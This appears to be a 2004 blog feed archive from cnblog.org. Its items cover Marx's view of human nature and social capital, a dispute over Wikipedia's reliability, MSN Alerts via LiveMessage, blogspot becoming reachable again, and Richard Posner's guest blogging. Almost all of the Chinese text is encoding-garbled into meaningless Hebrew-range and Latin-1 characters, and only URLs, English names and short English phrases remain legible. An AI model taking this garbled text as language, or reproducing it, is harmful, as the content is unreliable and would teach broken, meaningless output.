    ׃ֹ׃ָֻµְִֽ¶¯ֱִ¦÷ֹֽח»ב¹״ֿµµִָ«ֳז·¢ױ¹£¬װֿײµׂגׂוֹֿװל¾ֱֳֻֽ¿ׂ»¸צָֻµִ¸צ׀װ£¬»עױ¡°װׂ»¶¨ׂגׂוֹֿ¿ֹׂװֻµ£¬ֱִ¦÷ֽ¹״ֿµµִ·¢ױ¹¶¼ַ־×׀־³ֹ÷ֽ·¢ױ¹¡®׳װ׃ֹ¸צ׀װ¡¯·‏־סµִ¡±¡£ָֻµִ¸צ׀װ·¢ױ¹¾ַָֻֽµִ±¾ײֱ¦ֱ¿µִ¼¯ײ׀ּוֿײ£¬ַ¸צּוµִ׀ְִם¡¢ֹתְם¡¢ֹח»בֻ״ײµְִת·µִ¼¯ײ׀ּוֿײ¡£ָֻµִ¸צ׀װ·¢ױ¹£¬¾ַֽׂ׳ה·ײ·¢»׃ָֻµִ¶ְּ״׀װ÷ָֻֽµִ׳װײק׀װ£¬ײ»׃׀¸צָֻµִ¶ְּ״׀װ÷ֽ׳װײק׀װµֳׂװ·¢»׃£¬ָֻµִ¸צ׀װ²ֵ׃׀¿ִֹµֳׂװ׀־³ֹ¡£

    ֲם¿ֻֻ¼¹״׃ָֻµִ·¢ױ¹ַ´׃ָֻµִ±¾ײ³צ·¢£¬»ש׃µ¼ש¡¢»ש׃ֹח»ב¹״ֿµ£¬װֿײµׂגׂוַֹֿ¿µקֳ¿ׂ»¸צָֻµִָ«ֳז·¢ױ¹÷ֽ¸צ׀װ·¢ױ¹¡£µ«ַֽ¬±£¬¡°ֲם¿ֻֻ¼÷ֽ¶ק¸סֻ¹ּב³צ£÷ָֻµִָ«ֳז·¢ױ¹¡¢ָֻµִ¡®׳װ׃ֹ¸צ׀װ¡¯ײ»׃׀µ½ֱֻ¡®ֽג²¿ְ½ח¶װ¸צָֻ²ִֵµִµ¼·¢ױ¹ֻשֶנµִֶֽ¶¯׳ק׃ֳ־׸צָֻ±¾ֹםֻש¼װ¦¡¯µִ±÷ע²ִֵµֿײ¡±¡£

    ¶‏®ׂ»ְ¼ֹֽת²תֱ¦µִ·¢ױ¹ַׂװײ×¶׳ק־×¹״¼ׂ×ֻ״¡¢ׂװײ×¶µִֹת²ת¡¢´«²¥÷ֽ¹׃ֳ־×»ש´¡µִֹת²תֱ¦¾­¼ֳ£¬¶רײ×¶´«³׀µִװ״ּוַָֻ£¬ׂע´ֻ£¬ײ×¶¾­¼ֳµִ·¢ױ¹µ¼¾ְַָֻֽאֹח»ב·¢ױ¹´׃ַףֻ׃ֽגµִֵ©ׂµ¡¢¹₪ׂµ¾­¼ֳ·¢ױ¹׳×ֿעַףֻ׃ִµְִָֻא׳װֹם·¢ױ¹µִ¹‎³ּ£¬¡°¿ֹׂװֻµ£¬ְָֻאֹח»ב׳ֿעײ×¶¾­¼ֳµִ¹‎³ּ£¬¾ַֽ׳ֿע½ג·ֵµִ¹‎³ּ£¬¾ַֽױזױ‎´׃׳װװ׳ֿע׳װ־×£¬׃ֹ±״ָ»׳ֿע׳װ׃ֹµִ¹‎³ּ¡±£¨ׁמ׳¿ז ׃ן£©¡£׳ק־×ײ×¶¾­¼ֳװ­¶¯ֱ¦µִָֻ£¬ָח¹ֳ»׃׀ָֻµִ¸צ׀װ½ג·ֵ¡¢ֳ»׃׀ָֻµִ¸צ׀װ·¢ױ¹£¬¾ֽ²»»ב׃׀ײ×¶µִ´´׀ֲ£¬ָח¹ֳ»׃׀ָֻµִ·¢ױ¹£¬¾ֽ²»»ב׃׀ײ×¶¾­¼ֳµִ·¢ױ¹¡£ֹח»ב׀װָם¼‏°יֻז»¥ֱ×ֽרµִ³צֿײ£¬־×ָֻµִ¸צ׀װ·¢ױ¹¡¢־×ָֻµִ·¢ױ¹ּב¹©ֱֻ¿ִֹµִּץ¼‏÷ֽ·¢ױ¹µִ¿ױ¼ה¡£

    ֹח»ב׀װָם¼‏ַ¿µקײקּוֹם·µִ½¨ֱ¢£¬ײקּוֹם·µִ׀־³ַֹ¸צ׀װµִ±םױק£¬ַֹח»ב¹״ֿµֽ״ױ¹¹¹½¨׀ֵָ־µִ»ש´¡¡£¶רײקּו¸צ׀װֹם·µִ½¨ֱ¢£¬¸תײקּוµִױ¹ֿײֱִ¦µִ´ף׀¡µִ±םױקֿא¸¨ֿא³ֹ¡£ײקּוµְִֽ¶¯ֱִ¦¿ֹׂװֽ¨¹‎ײקּו׃כֶהֻשָָכµִֹחָ÷µִ»¥¶¯¹״ֿµµֳׂװּוֿײ£¬ױג׀©»¥¶¯¹״ֿµײקׂ×ּוֿײװׂװײ×¶·ײֿם־×ֵ¦´רµִײ×¶׳×»¯ֹֿ¡£ָח¹װֻ׃ֳׂ°ײ׀׃פ´־ְֹ׃כײסִ¹דֲ¡£¨Ikujiro Nonaka & Hirotaka Takeuchi£©ֻשּב³צ÷ֳֽטצµִײ×¶׳×»¯ְםֲ¾ֽ¸ִַו³‏±ם´ן÷ֳֽק־ת¸צּו׃כֹחָ÷ײ®¼הֻש³ֿײµִׂװײ×¶׳×»¯־×÷ֻ׀ִµִ¸צֱִָֻ¦÷ֽ¼¯ּוֱִ¦µִ»¥¶¯׳ק׃ֳ¡£

    ¸צּו׃כֹחָ÷»¥¶¯ֱִ¦·¢ױ¹׃׀ֱ½¸צ´זװµִ»ש±¾ּץ¼‏£¬ׂ»ַ¸צָֻ¶װײ×¶µִ³ײ׀ר»‎ְ£¬¶‏ַ½»ֱק£¬ױגֱ½¸צּץ¼‏׳װֹם׃ײַֿא»¥׳ק׃ֳ£¬¸צּו¶װײ×¶µִ³ײ׀ר»‎ְµִ׃׀׀§ֽ¾¾¶׀טׂ×ֽ¨¹‎¹ד·÷µִ½»ֱק½ר׀׀£¬¹ד·÷µִ½»ֱקִ¹»´½ר¸צָֻ¶װײ×¶»‎ְµִֹמ¶ָ¡¢¹ד¶ָ÷ֻֽ¶ָ£»ֱםׂ»·½ֳז£¬׳ק־×ֹחָ÷ײ׀ׂ»װ±µִ¸צּו£¬ֶהײ×¶µִ»‎ְ³ּ¶ָ¶װֶה½»ֱק¶װֿףµִ·¶־§׃ײ׃׀ײ±½׃µִ׃°ֿל÷ֽ׳ק׃ֳ£¬ׂ²¾ַֽ¸צּוײ×¶»‎ְ¶װ¸צּוֹח»ב¹״ֿµµִ¹¹½¨׃׀׳ֵײ±½׃µִײֶװ¼׳ק׃ֳ¡£

    ֹח»ב׀װָם¼‏ֻשױ¹ֿײµִ׃ֵֶ²»½צַ׃ֹ׃ִֻ¹»װײ×¶»‎ְׁ§ֿ°µִµ¼ש»מ¶¯ײ׀¡¢װ¸צָֻ׃כֹחָ÷·¢ױ¹µִ»¥¶¯½»ֱקײ׀£¬·¢ױ¹ֱָֻֻµְִֽ¶¯ֱִ¦÷ֹֽח»ב¹״ֿµ£¬¸װ׃ֻֽ»ֱֲֶֶֻם¿ֻֻ¼÷ֽ¶ק¸סֻ¹ֻשּב³צµִָֻµִָ«ֳז·¢ױ¹¡¢ָֻ׳װ׃ֹ¸צ׀װ·¢ױ¹µִײֶװ¼ּץ¼‏£¬¹µֳ¡°ֽג²¿ְ½ח¶װ¸צָֻ²ִֵµִµ¼·¢ױ¹ֻשֶנµִֶֽ¶¯׳ק׃ֳ־׸צָֻ±¾ֹםֻש¼װ¦¡±£¬ׂע´ֹֻח»ב׀װָם¼‏²»½צ´½רָֻµִ·¢ױ¹£¬¶רַׂ¹µֳָֻµִ·¢ױ¹´׃ֿײµµִµ¼שׂגׂוֹֿ³ֹ־׿ִֹ¡£»ש׃ֹח»ב׀װָם¼‏£¬¾׃׀ײקּו׳װ¾ץׂג¶µִָֻ£¬ֶה·¢ױ¹µִ³ּ¶ָָ¡¾צ׃ֶה׳װֹםֵ¬ֱ¦µִ³ּ¶ָ£¬»עױֻµָ¡¾צֶה³ֶֹה־×ָֻµִײקּו׳ק׃ֳ·¢»׃µִ³ּ¶ָ¡£

    £¨׳¢£÷±¾־ִ־ס¶ֲם¿ֻֻ¼µִָֻׁ§ֻ¼ֿכ¡·ׂ»יµ®ִֻױֲ¡°ֲם¿ֻֻ¼ֲָֻµִ·¢ױ¹¡±µִ¶ֱ÷ף¸׀¡£־ִײ׀ׂ‎÷ֵײ׀µִִָ·²ֳ»׃׀׳¢ֳק³צ´¦£¬¾שַ´׃װ­יײ׀ױ׳צ¡££©

    ²־¿¼־ִֿ׳£÷
    ¡¶ֲם¿ֻֻ¼µִָֻׁ§ֻ¼ֿכ¡·£¬װ¬¹ףָ£¬±±¾©¦·¶´ףׁ§³צ°זֹח£¬1996
    ¡¶÷ת¿ֻ׃¢½ּ׃‎־ִ¼¯¡·£¬צִב¿ ײק±א£¬½ּ׃‎¿ֶׁ§³צ°זֹח£¬2003
    ֲײ×¶¾­¼ֳ£¬ׁמ׳¿ז£¬http://www.sd-wt.com/news/zhushu004.htm
    ֹח»ב׀װָם¼‏׃כָֻµִײקּו׀װ£¬׳¯׀דְצ£¬http://www.online-edu.org/newarticle/articles/35/3555.html]]>
    -
    - - ±¾־ִװ­·¢װ־¬»ש°¿ֶֽרֲחװ׃ײ¾־¬»ש°¿ֶµִ׀ֵ׃‏ַױג¼¸ּל־¬»ש°¿ֶ׃¼‏ - http://www.cnblog.org/blog/archives/2004_08_29_cnblog_archive.html#109396069629238013 - ±¾־ִװ­·¢װ
    ־¬»ש°¿ֶֽרֲחװ׃ײ¾

    ־¬»ש°¿ֶµִ׀ֵ׃‏ַױג¼¸ּל־¬»ש°¿ֶ׃¼‏ֱ׀±םֹֿ׳מִָָײµִ»°ּג£¬ױג¸צּײֲַ׃ֹAndrew Lihװ׃¼‏ֱ׀±םֹּֿב³צְ´£¬ֶנׂעַSyracuse NY Post-Standardµִ׳¨ְ¸׳ק¼ׂAl Fasoldtµִׂ»ֶ×־ִױֲLibrarian: Don't use Wikipedia as source¡£װױגֶ×־ִױְֲן׳קױֵתְֶ־¬»ש°¿ֶ־·¨ּב¹©ָ¨ֽ‏µִ׀ֵֿ¢£¬ַ־·¨ײµµֳ׀ְֵµµִ׀ֵֿ¢ְ´װ´¡£׃¼‏ֱ׀±םµִּײֲ¿ֹׂװ²־¿´ױגְן¡£ױגֶ×־ִױֲ²»µ«װ־¬»ש°¿ֶֹחָ÷ִ²¿ׂ‎ֶנ·´ֿל£¬¶רַׂװBlogָ¦׳׃ְןֳזׂ²׃׀»״׃¦¡£Many to ManyµִRoss·¢ֱֻׂ»ֶ×־ִױֲ£÷Wikipedia Reputation and Wemedia Project£¬Joi Ito ׀´ֱֻWikipedia attacked by ignorant reporter £¬־ִױְֲן»¹ּבµ½ֱֶֻהֻ¼¸¸צBlogger¶װ´ֻµִ¿´·¨¡£

    ־ׂ׳װ¼÷¹׃ֳ־¬»ש°¿ֶµִ¾­ׁיַ־¬»ש°¿ֶ»¹ַ·ַ³£׃׀°ןײתµִ¡£־ׂ׳װ¼÷ׂ²׀´־¬»ש°¿ֶ£¬־ׂ¾ץµֳ־¬»ש°¿ֶ²־׃כױµִּ¬¶ָ»¹ַֽ¦ֻֿׁאµִ£¬µ±ָ»־ֳַׂµִֻ®ֶ½¿ִֹ»¹׃׀ֿ£¬µ«Wikiַֿא׀ֵ¼¯ׂ¸¿ֹׂװ³ֹפֳµִ£¬־¬»ש°¿ֶײ׀־ִױֲµִֻ״ײ¿ֹׂװײנ²½µֳµ½¸ִֶֹ¡£
    ]]> - - - ֿכֳָ¸¶אµִ׃ֳ»§¶©װִִדµִblog£¬µ«ַ²¢²»ַֻש׃׀ה¯ְְױ¶¼¶®µֳ¹ - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109370624918358628 - MSN Alerts£¬ֻש׃׀MSNµִ¹׃ֳױ¶¼¿ֹׂװ¶©װִִדµִblog£¬ײ»ׂ×ִדµִblog׃׀¸׀ֲ£¬¶©װִ׃ֳ»§¾ֲֽםִֹֿװֳַֻµִMSNֹֿױµ½ּב׀ׁ¡£

    ּב¹©ױג¸צ·‏־סµִֽרױ¾ַMessageCast¡£ײ»ׂ×ִדװױג¸צֽרױ¾ֹֿ׳¢²בLiveMessageµִ·‏־ס£¬¾ֽ¿ֹׂװױµ½ׂ»¶־¼עµ¥µִ´תֲכ£¬°ׁױג¶־´תֲכ¼׃ָכִדµִblog£¬¾ֳִָֽה¯ְְױֽ¨¹‎µד»קױג¸צֽ¼±ךְ´·½±דµִװֳַֻµִMSNֹֿ¶©װִִדµִblogּב׀ׁ·‏־ס¡£LiveMessageµִ÷ףּ¨ֹטײֳׂ²·ַ³£·ב¸»£¬¿ֹׂװּם¼׃¶א¸צblog£¬ׂ²¿ֹׂװ¸צ׀װ»¯ֹטײֳּב׀ׁµִׁש½÷ֽ¸׀ֲֶµֲ¡£

    ÷ֽDel.icio.usׂװ¼°Furlׂ»ׁש£¬LiveMessageׂ²ַׂ»ֿמֳג·ׁµִ·‏־ס¡£]]>
    -
    - - װֲם¿ֻֻ¼µִָֻׁ§ֻ¼ֿכײ׀£¬ֲם¿ֻֻ¼ָֿ־×ָֻ׀װַר±נ׃¶¯־ןַָֻµִ׳װָ»פ׀װ - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109363018767946107 -
    װ¶װָֻ׀װ÷ָֻֽµִ±¾ײ½ר׀׀׳·־÷ֽ¿¼²לײ®÷ף£¬ֲם¿ֻֻ¼׃ײ׳÷ב¹‎ָ¥ֻש׃׀־¨־ןײקׂוױׁ§׃כ־¨׀ִײקׂוױׁ§·¢ױ¹·£¬ֽ¨¹‎ֵתֵ׀÷ֽׁןֶת£¬׳½בּבֱ¶³צ¡°ָֻ׳ק־×µ¼שײקּוµִײקּו׀װ¡±µִ¹µד£¬²¢¡°׃ֹ´ֻµֿײֱֻױׁ§·ֹֿµִ¸ןֳ±ה¸ן¡± ¡£

    ֲם¿ֻֻ¼µִָֻµִµ¼שײקּוµִײקּו׀װ£¬¾ַֽׂ×ַף´׃ֿײµ¡¢¸׀׀װµִָ¥ְם½גָֻµִײקּו׀װ£¬ׂ×ַף´׃ָֻµִײק¹·½ֳזָ¥ְם½גָֻµִײקּו׀װ¡£׃ֹ׃װµ¼שµְִֽ¶¯¹‎³ּ±םֿײ³צֱ½ײײ¹״ֿµ£¬ׂ»ײײַ׳װָ»¹״ֿµ£¬ׂ»ײײַֹח»ב¹״ֿµ£¬ׂע´ֻ£¬ֲם¿ֻֻ¼װ¶װָֻµִײקּו¹ז¶¨׀װׂ²°ְ¨ֱ½´ף²¿·ײ£¬ׂ»ַײקׂ×±םֿײ׃ײק¿ּֽוײ®¼הָֻµִײקּוִ¶¯׀װ¡¢׳װײק׀װ÷ֽ׳װ־×׀װ£¬¶‏ַ±םֿײ׃ײקּו׃כײקּוײ®¼הµִ½»ֽש£¬¼´ײקּו¼ה׀װ£¬²¢ַׂ£¬ֲם¿ֻֻ¼ָֿ־×£¬¼´¹ַײק¿ּֽוײ®¼ה¹״ֿµׂ²ַׂװײקּו¼הµִ½»ֽש־×ײ׀½יµִ£¬ׂע´ֻ£¬ײקּו¼הµִ½»ֽשַָֻµִֹת²ת»מ¶¯ְµׂװ½ר׀׀µִ±״ׂ×ּץ¼‏¡£

    ֲם¿ֻֻ¼ָֿ־×£¬½»ֽשַ¸צָֻײקּוׂג¶׀־³ֹµִײ״ׂ×ּץ¼‏£¬½»ֽש׀־³ֹ¼¯ּוׂג¶£¬½»ֽש´½רָֻ÷ֹֽח»בµִ·¢ױ¹¡£¡°װְָֻאְת·ײ׀£¬ֹת²תµִ·¢ױ¹¾צ¶¨׳ֵ½»ֽשµִ·¢ױ¹£¬ֽ¬±£¬½»ֽשµְִ©´ףׂ²¾צ¶¨׳ֵֹת²תµִֶױ±י·¢ױ¹£¬ֹת²ת÷ֽ½»ֽשµִױגײײֿא»¥׳ק׃ֳ¾צ¶¨׳ֵָֻ÷ֹֽח»ב¼°ֶהְת·ׁ±ה¡±£¬¡°ױ¸צְָֻאֹח»בµְִת·ַֹת²ת÷ֹֽת²תֱ¦µִ·¢ױ¹·£¬ׂ²ַ½»ֽש÷ֽ½»ֽש׀־½µִ·¢ױ¹·¡±£¬¡°ׁׂ³ֹ־×?טפµִ¾ֹµִ½»ֽש׀־½±»׃¦׃±ָ½ֿ·¢´ןµִֹת²תֱ¦£¬ׂע¶רׂ²׃¦׃¸½ר²½µִ¸צָֻ׳װײק»מ¶¯ְא׀ֽµִ׀ֲµִ½»ֽש׀־½ֻש´תּז¡±¡£

    »״¹ְָֻֻאֹח»ב·¢ױ¹µְִת·³₪÷׃£¬ְת¾­ֱֻׂװֹת²תֱ¦÷ֽ¼¼ץ½ר²½־×ײ׀׀ִµִ¹₪¾ײֶװל¸ןֳ¡¢ֵ©ׂµ¸ןֳ¡¢¹₪ׂµ¸ןֳ÷ֽײ×¶¸ןֳױגִֻ´־¸ןֳ£¬µֿײְָֻאְת·²»¶ֿֿעַ°װ¾ַ¨¡£¶רְָֻאֳ¿ׂ»´־¸ןֳֳ¿ׂ»´־װ¾ַ¨£¬°יֻזֹת²תֱ¦÷ֽ¼¼ץµִֽ»±ה£¬ײקּוײ®¼הµִ½»ֽשׂ²·¢ֹת׳ֵֽ»±ה¡£ְ¼ֽײ®½»ׂװײ×¶µִֹת²ת¡¢·ײֵה÷ֽ¹׃ֳ־×»ש´¡µִֹת²תֱ¦¾­¼ֳ£¬¹µֳ׃כײ®ֿא׃¦µִׂװֻ¼ֿכ»¥ֱס¢´½רײ×¶׳×»¯µִ¡°׀¡µּו£¨ָֻ£©´ףֽרֲח£¨ֹח»ב¹״ֿµ£©¡±¡¢´ת±םײ×¶¾­¼ֳ±´תײקּוײ®¼ה½»ֽש÷ֽ½»ֽש׀־½µִֹח»ב׀װָם¼‏׃¦װֻ¶רֹת¡£ֹח»ב׀װָם¼‏ִ‎¾ֱֻׂװֲִֻֿ¸צ·½ֳזµִּ״ױק£¬¼´ָֻµִײקּוֹם·(who)¡¢ָֻµִֹת²תֱ¦¼´׃µ׃׀µִײ×¶³ֱµם£¨who know what£©¡¢ֻ¼ֿכ»¥ֱ×ײ×¶¹²ֿם¼´ײקּוײ®¼הµִ½»ֱק¡¢ׂװ¼°׃ֹ´ֻ¹¹³ֹµִֹח»ב¹״ֿµ¡£

    »ש׃ײ×¶¾­¼ֳµִֹח»ב׀װָם¼‏µִײקּו½»ֽש¹״ֿµ½«ֲם¿ֻֻ¼ֲָֻµִײקּו׀װֻ¼ֿכ׃ְֹםֲֶֽֿעֱֻֿײµ¡£ֹח»ב׀װָם¼‏ֻש¹¹½¨µִ½»ֽש¿ױ¼הֶַ½µָ׳װ׃ֹµִ½»ֽש¿ױ¼ה£¬ַ׃ֹ½»ֽשײקּו½ר׀׀׳װײקׁ¡װס׳װײק¿״ײֶµִ½»ֽש¿ױ¼ה£¬ִַ¹»½ר׀׀ײ×¶׳×»¯´´׀ֲ´½רײקּו²»¶ֿ׳װ־ׂ¸׀ֲµִ½»ֽש¿ױ¼ה£¬ַײקּו׃כײקּו»¥ֿא·¢ֿײ׀־³ֹֹחָ÷ּ½ֻקֱל׃ע׀ֲײ×µִ½»ֽש¿ױ¼ה£¬ׂע´ֻ£¬ֹח»ב׀װָם¼‏ֻש¹¹½¨µִײקּו½»ֽש¿ױ¼ה³ה·ײµֿײ¡¢·¢»׃÷ֽױ¹ֿײֱָֻֻµִײקּו׀װ£¬¼´ָֻµִײקּוִ¶¯׀װ¡¢׳װײק׀װ÷ֽ׳װ־×׀װ£¬ׂװ¼°ײקּו׃כײקּוײ®¼ה½»ֽשµִײקּו¼ה׀װ¡£

    ָח¹ֻµ»¥ֱ×ֽרֲחµִ·¢ױ¹¹µֳׁ§ֿ°ִ¹»¿חװ½±¿ױ¡¢־±־´¦µִ·¢ֹת³ֹ־׿ִֹ£¬÷־ָֻװָ־÷־±¼הָ־÷־µ״µד¶¼¿ִֹ½׃´¥µ½ְ½חֹֿ׃ֵ׀דµִ׳װ´ִָ£¬¶רױגׁשµִֻ¼ֿכֲם׀×¶.ֲף¿ֲֻ¬÷÷װחװ1964ִך׃ֶה³ֳֹ׳ק¡¶ְם½גֳ½½י??ֲָֻµִׁ׃ֹל¡·ײ׀¾ֽֿׁׂװֲ¶÷ֽװ₪ׁװ¡£ֹח»ב׀װָם¼‏ײ®׃כ»¥ֱ×ֽרײ®׃כֳ½½י£¬ֶה¸ןֳµִµ״·½¾ַֽ°ׁ³ֹ³₪¡¢°ׁ·¢ױ¹¡¢°ׁ׳װ׃ֹµִָ¨ְ»¹¸רֱֹֻתֳײקּו£¬´½רײקּוׂג¶µִ׀־½£¬¹¹½¨ֱֻׂװֻ¼ֿכ»¥ֱ×ײ×¶¹²ֿם־×½»ֽשֵ¦´ר÷ֶֽ·ײ´½רֱֻײקּו´´׀ֱֲִ¦µִֹת³ֹ£¬ּבֹ‎ֱֻײקּוֹתֳµִ¼ײµ÷ֽׂגׂו¡£

    װְָֻאְת·ײ׀£¬ײ×¶¾­¼ֳֹת²תµִ·¢ױ¹¾צ¶¨׳ֵ½»ֽשµִ·¢ױ¹£¬ֽ¬±£¬ֹח»ב׀װָם¼‏ײקּו¼ה½»ֽשµְִ©´ףׂ²¾צ¶¨׳ֵײ×¶ֹת²ת÷ֽ´´׀ֲµִֶױ±י·¢ױ¹£¬ײ×¶¾­¼ֳµִֹת²ת÷ֹֽח»ב׀װָם¼‏ײקּו½»ֽשµִױגײײֿא»¥׳ק׃ֳ¾צ¶¨׳ְֵ¼ֽײ®½»ָֻ÷ֹֽח»ב¼°ֶהְת·ׁ±ה¡£

    ֹח»ב׀װָם¼‏ֳָֹתֳײקּו»מ³צֹתֳµִׂגׂו£¡ֹח»ב׀װָם¼‏ֳָֹתֳײקּוֲץֿע׳װ׃ֹֽץ¹ת£¡

    £¨׳¢£÷±¾־ִ־ס¶ֲם¿ֻֻ¼µִָֻׁ§ֻ¼ֿכ¡·ׂ»יµֱשױֲ¡°ֲם¿ֻֻ¼ֲָֻµִײקּו׀װ¡±µִ¶ֱ÷ף¸׀¡£־ִײ׀ׂ‎÷ֵײ׀µִִָ·²ֳ»׃׀׳¢ֳק³צ´¦£¬¾שַ´׃װ­יײ׀ױ׳צ¡££©

    ²־¿¼־ִֿ׳£÷
    ¡¶ֲם¿ֻֻ¼µִָֻׁ§ֻ¼ֿכ¡·£¬װ¬¹ףָ£¬±±¾©¦·¶´ףׁ§³צ°זֹח£¬1996
    ¡¶³׀´«׃כ´´׀ֲ£÷ֿײ´ת׀װ¡¢ָ«ַע»¯׃כֹח»בׁ§ְםֲµִ±ה¸ן¡·£¬־ִ¾ ײר£¬»×¶«´ףׁ§³צ°זֹח£¬2004
    ¡¶ְם½גֳ½½י??ֲָֻµִׁ׃ֹל¡·£¬ֲם׀×¶.ֲף¿ֲֻ¬÷÷ ײר£¬÷־µְ¿ם ׂכ£¬ֹּ־ס׃¡י¹£¬2004
    ֹח»ב׀װָם¼‏׃כ½ּ¦µִ׳װ־ׂ¸׀ֲ£¬׳¯׀דְצ£¬http://www.online-edu.org/newarticle/articles/35/785.html]]>
    -
    - - ױג¸צױשָ¡׳מ÷ףׂ»ֳµֳִֵֵ·ַ³£׃׀ׂגֻ¼¡£ױגַJonathan Cr - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109360982133296940 - ׳מ÷ףׂ»ֳµֳִֵֵ·ַ³£׃׀ׂגֻ¼¡£ױגַJonathan Crowe µִׂ»¸צ׃׀ָ₪ֿמִ¿¡£
    ]]>
    -
    - - - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109359089639198204 - Blogµִ¸ִֵמ·¶³כַ²ֳ´£¿Blogµִ»ש±¾ּ״ױקַ²ֳ´£¿ױגײײׁ׀¾¿µִׁ׀¾¿¶װֿףַ²ֳ´£¿µָµָ¡­¡­ױגׁשׂװְ´װל³ֹ÷¶א¶«־קׁ׀¾¿ֶנְ´ֳ»׃׀·½ֿע¡£

          ֱמָֻ׀ֻ·µִַ£¬¾־ֻׂשײ×ׁׂ¾­׃׀´«²¥ׁ§ץֱל׃עִµִׁ§ױ¿×¼ֹםּוֱ¦׀׀µִ´׃ֲBlog־ִ»¯ֿײֿףµִׁ׀¾¿£¬±ָָח־ֻׂש¾´ֵוµֱִץ½ע׀¡½ד¾ֶַֽהײ׀µִׂ»־»£÷
    ׂװֲֿ±»ׂ‎׃ֳ:
          ׃׀׀©²©¿ֽֿײֿףµִׁ׀¾¿ױ²¢ֳ»׃׀ױזױ‎µִ²©¿ֽ¾­ְת£¬ֻשׂװ׳מ÷ףµִׁ׀¾¿³ֹ¹ׂ²׃׀׀©ֶַֻ¶ר·ַ¡£±ָָח׃׀׀©ָֻ½«¡°ִ¾׳׃ְֳ¡±÷ֽ¡°ײס׃°ַאֽ«¡±׳ק־ײ©¿ֽµִ´ת±ם½ר׀׀־ִ»¯ֵתֵ׀£¬ָֿ־ײ©¿ֽֿײֿף½«µ¼ײֲֽרֲח׀´׳קµִ¶יֲה£¬ױגײײ¹µד׃׀׀©¼«¶ֻ¡£ָח¹¶אׂ»׀©¶װ²©¿ֽµֱִֻ½ג£¬ֻ¾ֽ²»»בµֳ³צױגׁשµִ½בֱֲֻ¡£                      ??ֱץ½ע²©¿µִ¸צָֻBlog

          ´׃´«²¥ׁ§µִ½ַ¶ָׁ׀¾¿Blogױג¸צ¡°׳װֳ½ּו¡±´ת±םµִ´«²¥¸ִֵמ£¬±ֶָנׂ»׀©µֱBlogײ®ֳµִ־±Blogׁ׀¾¿ױֳַ£¬־ׂ¾ץµֳ¸׃׀¼ײµ¡£±ֿ¾¹´׃±¾ײֹֻֿµ£¬Blog²תֹת׃׀ֵֿ¢½»»»µִ׀טׂ×£¬¶ר׀ֵֿ¢½»»»פ׃´«²¥µִ·¶³כ¡£ֿ£ֽ´׃¸׀£ְןµִ´«²¥װ÷ֿµµ½ֹח»בֹֿµִ´ףײ´«ֳ½£¬ִ¹»׃׀¸¶אµִ´«²¥ׁ§ױ¹״׳¢Blogµִׁ׀¾¿£¬ִ¹»¾¡¿לµִ¿×·¢³צ¸¶אµִBlogµִ׃¦׃ֳִ£½£¬·‏־ס׃ֿײ´ת»¯´«²¥¡£]]>
    -
    - - ¾­¹‎ׂ»ִך¶אְ´µִ²י·ג£¬blogger.comµִblogspot - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109357817421636670 - blogger.comµִblogspotײױ׃¿ֹׂװ·ֳ־ֱֻ£¡¿´¿´ױג¸צױ¾µד....

    NOTE: ´ף¼ׂ·´ְ¡µִ½ב¹£¬ֶֻ÷ץײ»׃׀־ׂױגְןµִ¿ֶׁ׀ֽר¿ֹׂװ·ֳ־£¬ֶ´‎½ֶֶהֻµִֽרֲחׂ²ִ½ג·ג¡£ֱם£¬»ע׀םױגײ»ַװ±µִ²י·ג¼¼ץ¹ױֿ£¿
    ]]>
    -
    - - CNBlog.orgֽרױ¾װLycos£¨ֿײMyrice£©ֽ׀¹ֱ½ - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109357402428946170 -
    ¶װֶ´‎÷ֽ¹״׳¢µְִ´·ֳױֻµֹש±§ַ¸£¬¶װ־÷ע÷ֽװ¸ׂגּב¹©¿ױ¼ה·‏־סµִֵף׃ֳַֻׁµ׀»׀»£¡
    ]]>
    -
    - - (¡¶²¨ֻ¹ְִֹ´ֱֻ2.0¡·)ְ³ֻ¹¸סָ«¼ׂױ‎װ¶ָ¼----ְִַןֳ»׃׀ׂע - http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html#109334461265061301 - ²¨ֻ¹ְִֹ´ֱֻ2.0¡·)

    ְ³ֻ¹¸סָ«¼ׂױ‎װ¶ָ¼----ְִַןֳ»׃׀ׂעּ״ֽר¡£

    ְֳ¹תֱ×°מµֶׁ²»״ַרֹֻֿ·¨װ÷´ף·¨¹²¨ֻ¹ִֹ (Richard Posner)´ףָֻ, ױ‎װ׳צ¿ְֽ³½ּµִֽרײ¾¡£

    ױג¸צ´ף´ף׃׀ֳµִ²¨ֻ¹ִֹ´ף¸ֵׂ²ַµׂ»´־׀´ֽרײ¾°ֹ£¬¿×׀ִµֳ²»µֱֳֻ¡£

    ¸ק־»ֽר׃ַָָׁי¸ױַ£¬׃»װ¾·¢±ם»״ֿל¡£׃׀ָ₪µִַ£¬־ֳַָׂח÷־³ֶ÷פ·¨¹´ףִָֻ״£¿׃׀µִ׀¡׀ִׂםׂםµ״ֻµ£÷(Dear) Judge Posner...; ׃׀µִ±ֿ¹§±ֿ¾´µ״ֻµ£÷Your Honor...(ױגְֳַ¹ת·¨ֽ¥¶װ·¨¹µִ׳נ³ֶ£¬׃¢¹ת·¨ֽ¥ֹֿµִ³ֶ÷פַ¡°My Lord¡±ָח÷־ָח÷־); µ±ָ»ִדׂ²¿ֹ±נ´ם¹‎ױג»ת»ב£¬¿ֹׂװ½׀׀¡ֳׁ½£¬ֿװµֳַ׳ֲָָן£÷Hi, Dick (÷ֳֿסִֵ׳ֵֻµִ¼ח°ע£¬»½ױגֳ´ׂ»ֹש).....

    ´ף¼ׂ׃׀׀ָֻ₪µִ»°£¬¿ֹׂװָ¥¿´¿´ִַ׀©־ו»¨°ֳֵֻµֱִפׁװ£÷׃׀±ם¾³ח¾´µִ£¬׃׀־ׁ¯°ֻ״װµִ£¬׃׀ך°·ס°¸¼‏µִ£¬׃׀ױש±ח¹ת¼ׂ´ףֲµִ....¡¡׃׀ׂ»־»נֳblind miceµִֽר׃ׁ¸ר·¨¹´ףֱָֻפֱֻׂ»¾ה»°£¬÷ֳֿסׂ»²»׀¡׀ִµְֱֶֶֻּל»ת£÷Welcome to the Jungle£¡

